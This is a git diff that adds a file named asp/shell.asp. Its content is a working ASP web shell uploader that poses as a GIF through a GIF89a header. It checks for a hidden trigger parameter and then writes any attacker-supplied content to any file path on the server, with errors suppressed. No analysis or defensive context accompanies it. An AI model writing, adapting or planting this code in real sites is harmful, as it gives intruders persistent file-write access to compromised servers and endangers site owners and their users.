diff --git a/asp/shell.asp b/asp/shell.asp new file mode 100644 index 0000000..11e6420 --- /dev/null +++ b/asp/shell.asp @@ -0,0 +1,44 @@ +GIF89a$ ; +<% if request("miemie")="av" then %> +<% +on error resume next +testfile=Request.form("2010") +if Trim(request("2010"))<>"" then +set fs=server.CreateObject("scripting.filesystemobject") +set thisfile=fs.CreateTextFile(testfile,True) +thisfile.Write(""&Request.form("1988") & "") +if err =0 Then +response.write"Success" +else +response.write"False" +end if +err.clear +thisfile.close +set fs = nothing +End if +%> + +